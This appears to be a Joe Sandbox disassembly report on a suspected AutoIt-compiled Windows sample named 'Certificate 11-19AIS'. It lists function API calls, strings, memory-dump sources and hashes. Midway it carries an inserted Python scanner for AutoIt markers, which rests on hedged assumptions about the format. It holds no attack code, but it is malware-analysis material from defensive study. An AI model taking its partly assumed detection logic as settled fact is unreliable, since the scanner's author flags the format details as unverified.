                                                                              APIs
                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 007ED8EB
                                                                              • _wcscmp.LIBCMT ref: 007ED8FC
                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 007ED924
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 007ED941
                                                                              • _wcscmp.LIBCMT ref: 007ED95F
                                                                              • _wcsstr.LIBCMT ref: 007ED970
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 007ED9A8
                                                                              • _wcscmp.LIBCMT ref: 007ED9B8
                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 007ED9DF
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 007EDA28
                                                                              • _wcscmp.LIBCMT ref: 007EDA38
                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 007EDA60
                                                                              • GetWindowRect.USER32(00000004,?), ref: 007EDAC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                              • String ID: @$ThumbnailClass
                                                                              • API String ID: 1788623398-1539354611
                                                                              • Opcode ID: d0c70a4a4f11d343fb0320935bb83c771c8098b7c3aaeed1dbfd781ffe424c8d
                                                                              • Instruction ID: 32d05877b18749f14f9c46665618a2c5cdd1dc8780c9c804c338e1f4ca6deb1f
                                                                              • Opcode Fuzzy Hash: d0c70a4a4f11d343fb0320935bb83c771c8098b7c3aaeed1dbfd781ffe424c8d
                                                                              • Instruction Fuzzy Hash: 1181F8710093859FDB11DF15C885FAA7BE8FF88314F04846AFD899A096E738ED45CBA1
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 1038674560-1810252412
                                                                              • Opcode ID: c7d5d8ff8db8bfe08ef1a50e4ca061eeabf93119057a4b15f1eb0c34bd866598
                                                                              • Instruction ID: d549ce18dc7bc158dfa15b0a6cf8b33d01cd8f7e4e1f9c63cf19034bf4ee5db2
                                                                              • Opcode Fuzzy Hash: c7d5d8ff8db8bfe08ef1a50e4ca061eeabf93119057a4b15f1eb0c34bd866598
                                                                              • Instruction Fuzzy Hash: 6731CE31A44649EAEB24FB51CD57FEEB3B4EF24354F200069F451B11D1EB6DAE04C651
                                                                              APIs
                                                                              • LoadIconW.USER32(00000063), ref: 007EEAB0
                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007EEAC2
                                                                              • SetWindowTextW.USER32(?,?), ref: 007EEAD9
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 007EEAEE
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 007EEAF4
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 007EEB04
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 007EEB0A
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007EEB2B
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007EEB45
                                                                              • GetWindowRect.USER32(?,?), ref: 007EEB4E
                                                                              • SetWindowTextW.USER32(?,?), ref: 007EEBB9
                                                                              • GetDesktopWindow.USER32 ref: 007EEBBF
                                                                              • GetWindowRect.USER32(00000000), ref: 007EEBC6
                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007EEC12
                                                                              • GetClientRect.USER32(?,?), ref: 007EEC1F
                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007EEC44
                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007EEC6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                              • String ID:
                                                                              • API String ID: 3869813825-0
                                                                              • Opcode ID: a5e04eff288a8a8207cc6be0837bb531665b92c30312f91c75f0c9898e89fa04
                                                                              • Instruction ID: ee16bf4cc6d404855ce0d0df76ec3c0de107135de5b5a13d1e14665dcfd9a294
                                                                              • Opcode Fuzzy Hash: a5e04eff288a8a8207cc6be0837bb531665b92c30312f91c75f0c9898e89fa04
                                                                              • Instruction Fuzzy Hash: 56517C70900749EFDB20DFA9DD8AF6EBBF5FF48704F004928E696A25A0D774A944CB50
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 008079C6
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 008079D1
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 008079DC
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 008079E7
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 008079F2
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 008079FD
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00807A08
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00807A13
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00807A1E
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00807A29
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00807A34
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00807A3F
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00807A4A
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00807A55
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00807A60
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00807A6B
                                                                              • GetCursorInfo.USER32(?), ref: 00807A7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: b6704ccb7b1a705e2721a5d26396a93cd3eb4c93f90fe72858c3a87d7a7e57ed
                                                                              • Instruction ID: cbb89490df445d615d2f6e71c0140aedfc1cc7722ed09e912251b32ef1b3f588
                                                                              • Opcode Fuzzy Hash: b6704ccb7b1a705e2721a5d26396a93cd3eb4c93f90fe72858c3a87d7a7e57ed
                                                                              • Instruction Fuzzy Hash: DE3129B0E083196ADB509FB68C8995FBFE8FF04750F50453AE50DE7181DB78A5008FA1
                                                                              APIs
                                                                                • Part of subcall function 007CE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007BC8B7,?,00002000,?,?,00000000,?,007B419E,?,?,?,0084DC00), ref: 007CE984
                                                                                • Part of subcall function 007B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B53B1,?,?,007B61FF,?,00000000,00000001,00000000), ref: 007B662F
                                                                              • __wsplitpath.LIBCMT ref: 007BC93E
                                                                                • Part of subcall function 007D1DFC: __wsplitpath_helper.LIBCMT ref: 007D1E3C
                                                                              • _wcscpy.LIBCMT ref: 007BC953
                                                                              • _wcscat.LIBCMT ref: 007BC968
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 007BC978
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 007BCABE
                                                                                • Part of subcall function 007BB337: _wcscpy.LIBCMT ref: 007BB36F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                              • API String ID: 2258743419-1018226102
                                                                              • Opcode ID: 60de1cb71b8544719651b27d29da3d255a42588fb02a0beb535b5942515807b8
                                                                              • Instruction ID: 0ac8d0f9d171cbf7b4cbcb4f588f55a67d977d3436c2b0054137543e64c2e28e
                                                                              • Opcode Fuzzy Hash: 60de1cb71b8544719651b27d29da3d255a42588fb02a0beb535b5942515807b8
                                                                              • Instruction Fuzzy Hash: A4126771508341DBC725EF24D895AAFBBE5FF98304F00491EF58993262DB38DA89CB52
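The strings this function references ("AU3!", "EA06", ">>>AUTOIT SCRIPT<<<") are the markers the AutoIt script loader looks for, which is what the "Binary is likely a compiled AutoIt script file" signature keys on. The following scanner is an added example (not part of the Joe Sandbox report and not AutoIt's own code) that finds those markers in a raw file image. It assumes that in a compiled script the version tag follows the "AU3!" tag directly (b"AU3!EA06") and that the legacy marker may be stored as UTF-16LE text; the sample buffer is constructed inline.

```python
"""Locate compiled-AutoIt script markers in a file image (added example)."""
import re

# Markers taken from the strings this function references.
AU3_TAG = b"AU3!"
AU3_VERSION_TAG = b"EA06"          # version tag assumed to follow AU3_TAG directly
LEGACY_MARKER = ">>>AUTOIT SCRIPT<<<"


def find_autoit_markers(data: bytes) -> dict:
    """Return the offsets of every AutoIt marker present in `data`."""
    hits = {"au3_header": [], "legacy_utf16": [], "legacy_ascii": []}
    # "AU3!" followed by a four-character version tag such as "EA06".
    for m in re.finditer(rb"AU3![A-Z]{2}[0-9]{2}", data):
        hits["au3_header"].append((m.start(), m.group(0)[4:].decode("ascii")))
    # The legacy marker, as UTF-16LE resource text and as plain ASCII.
    for m in re.finditer(re.escape(LEGACY_MARKER.encode("utf-16-le")), data):
        hits["legacy_utf16"].append(m.start())
    for m in re.finditer(re.escape(LEGACY_MARKER.encode("ascii")), data):
        hits["legacy_ascii"].append(m.start())
    return hits


def is_probably_compiled_autoit(data: bytes) -> bool:
    """True when any of the loader markers is present."""
    h = find_autoit_markers(data)
    return bool(h["au3_header"] or h["legacy_utf16"] or h["legacy_ascii"])


def scan_file(path: str) -> dict:
    """Convenience wrapper: scan a file on disk."""
    with open(path, "rb") as fh:
        return find_autoit_markers(fh.read())


# Constructed sample image: a fake PE stub carrying both marker forms.
# Layout: 64 bytes of header, the UTF-16LE legacy marker (38 bytes),
# 8 bytes of padding, then "AU3!EA06".
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + LEGACY_MARKER.encode("utf-16-le") + b"\x00" * 8
    + AU3_TAG + AU3_VERSION_TAG + b"\x00" * 16
)

if __name__ == "__main__":
    print(find_autoit_markers(SAMPLE))
```

Run it against the submitted sample with `scan_file("Certificate 11-19AIS.exe")`; a hit on `au3_header` with version "EA06" corroborates the signature, while the absence of any hit does not rule AutoIt out, since the script resource may be packed or encrypted by a wrapper.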
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0081CEFB
                                                                              • DestroyWindow.USER32(?,?), ref: 0081CF73
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0081CFF4
                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0081D016
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081D025
                                                                              • DestroyWindow.USER32(?), ref: 0081D042
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007B0000,00000000), ref: 0081D075
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081D094
                                                                              • GetDesktopWindow.USER32 ref: 0081D0A9
                                                                              • GetWindowRect.USER32(00000000), ref: 0081D0B0
                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0081D0C2
                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0081D0DA
                                                                                • Part of subcall function 007CB526: GetWindowLongW.USER32(?,000000EB), ref: 007CB537
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                              • String ID: 0$tooltips_class32
                                                                              • API String ID: 3877571568-3619404913
                                                                              • Opcode ID: c0ee68948a838b00b1e6310ae0c7baf9a89fee0ae7a931a1798133334cbe9f4a
                                                                              • Instruction ID: c7b382d68ef1bea6a7574692583799d352deb2e1beafb9706b04ed164a1a40ea
                                                                              • Opcode Fuzzy Hash: c0ee68948a838b00b1e6310ae0c7baf9a89fee0ae7a931a1798133334cbe9f4a
                                                                              • Instruction Fuzzy Hash: 567168B1150705AFDB20CF28CC89FA677A9FB98704F084619F995C72A1D774E982CB62
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0081F37A
                                                                                • Part of subcall function 0081D7DE: ClientToScreen.USER32(?,?), ref: 0081D807
                                                                                • Part of subcall function 0081D7DE: GetWindowRect.USER32(?,?), ref: 0081D87D
                                                                                • Part of subcall function 0081D7DE: PtInRect.USER32(?,?,0081ED5A), ref: 0081D88D
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0081F3E3
                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0081F3EE
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0081F411
                                                                              • _wcscat.LIBCMT ref: 0081F441
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0081F458
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0081F471
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0081F488
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0081F4AA
                                                                              • DragFinish.SHELL32(?), ref: 0081F4B1
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0081F59C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                              • API String ID: 169749273-3440237614
                                                                              • Opcode ID: 79924bcd3894c14ea1026f52fbd55e55b3dd23282f9c221d8ee5112c5c6b870b
                                                                              • Instruction ID: a56ef42aa67692cf0cb41d3176eaa17f73186d3e9da484add33a07592ad1a369
                                                                              • Opcode Fuzzy Hash: 79924bcd3894c14ea1026f52fbd55e55b3dd23282f9c221d8ee5112c5c6b870b
                                                                              • Instruction Fuzzy Hash: 0F613A71108300AFC711EF64DC4AE9FBBE8FF98714F004A1DB695961A1DB74DA49CB52
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(00000000), ref: 007FAB3D
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 007FAB46
                                                                              • VariantClear.OLEAUT32(?), ref: 007FAB52
                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007FAC40
                                                                              • __swprintf.LIBCMT ref: 007FAC70
                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 007FAC9C
                                                                              • VariantInit.OLEAUT32(?), ref: 007FAD4D
                                                                              • SysFreeString.OLEAUT32(00000016), ref: 007FADDF
                                                                              • VariantClear.OLEAUT32(?), ref: 007FAE35
                                                                              • VariantClear.OLEAUT32(?), ref: 007FAE44
                                                                              • VariantInit.OLEAUT32(00000000), ref: 007FAE80
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                              • API String ID: 3730832054-3931177956
                                                                              • Opcode ID: 48a4f5a5374e48759b1608e53f6aff639b530eae0f557435552656b375e4266c
                                                                              • Instruction ID: e9159ad33d2ad71665ce99ca0508f50b2efbcec18e5296473457d0ca1e99336c
                                                                              • Opcode Fuzzy Hash: 48a4f5a5374e48759b1608e53f6aff639b530eae0f557435552656b375e4266c
                                                                              • Instruction Fuzzy Hash: 45D1BFF1604209EBCB249F65D889BB9B7B5FF04700F148499E6199B381DB7CED40DBA2
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 008171FC
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00817247
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharMessageSendUpper
                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                              • API String ID: 3974292440-4258414348
                                                                              • Opcode ID: 943765aa586bc34628defe5328170579512c04a1c29b6bfeeb68e6ae232ee6df
                                                                              • Instruction ID: 10fb5f7682410fdf3a2e06af150c52e050647751a0c0b89da65292f01a80153e
                                                                              • Opcode Fuzzy Hash: 943765aa586bc34628defe5328170579512c04a1c29b6bfeeb68e6ae232ee6df
                                                                              • Instruction Fuzzy Hash: D5917C74208601DBCB15EF20C845AAEB7A5FF94304F05485CF9969B3A3DB38ED4ACB91
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0081E5AB
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0081BEAF), ref: 0081E607
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0081E647
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0081E68C
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0081E6C3
                                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0081BEAF), ref: 0081E6CF
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0081E6DF
                                                                              • DestroyIcon.USER32(?,?,?,?,?,0081BEAF), ref: 0081E6EE
                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0081E70B
                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0081E717
                                                                                • Part of subcall function 007D0FA7: __wcsicmp_l.LIBCMT ref: 007D1030
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                              • String ID: .dll$.exe$.icl
                                                                              • API String ID: 1212759294-1154884017
                                                                              • Opcode ID: 3b67db77b7cbe3002518b4264e7942d2daa8a180914116bbab64dc97c3f7abd4
                                                                              • Instruction ID: 91c25fb08b808af320f20bbf11f0c3603cb9862e3b515d3ab1c8f016353cf25c
                                                                              • Opcode Fuzzy Hash: 3b67db77b7cbe3002518b4264e7942d2daa8a180914116bbab64dc97c3f7abd4
                                                                              • Instruction Fuzzy Hash: 71618A71500219FAEB249F64DC46FEE7BACFF28724F104506F915E61D1EBB4A990CBA0
                                                                              APIs
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • CharLowerBuffW.USER32(?,?), ref: 007FD292
                                                                              • GetDriveTypeW.KERNEL32 ref: 007FD2DF
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007FD327
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007FD35E
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007FD38C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 1148790751-4113822522
                                                                              • Opcode ID: 0b4d17853c7866fb2b0d8a1e6fe87f361aa8ba32b9efc326c2304598ae93c8a0
                                                                              • Instruction ID: 72c9f8331c0b5041b3d2a01fb49cd0b71e5b555474fa4bfa8500342ea15a002a
                                                                              • Opcode Fuzzy Hash: 0b4d17853c7866fb2b0d8a1e6fe87f361aa8ba32b9efc326c2304598ae93c8a0
                                                                              • Instruction Fuzzy Hash: F1514871104708DFC710EF10C885AAAB3E5FF88718F00885CF995A7291DB39EE0ACB92
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00823973,00000016,0000138C,00000016,?,00000016,0084DDB4,00000000,?), ref: 007F26F1
                                                                              • LoadStringW.USER32(00000000,?,00823973,00000016), ref: 007F26FA
                                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00823973,00000016,0000138C,00000016,?,00000016,0084DDB4,00000000,?,00000016), ref: 007F271C
                                                                              • LoadStringW.USER32(00000000,?,00823973,00000016), ref: 007F271F
                                                                              • __swprintf.LIBCMT ref: 007F276F
                                                                              • __swprintf.LIBCMT ref: 007F2780
                                                                              • _wprintf.LIBCMT ref: 007F2829
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007F2840
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
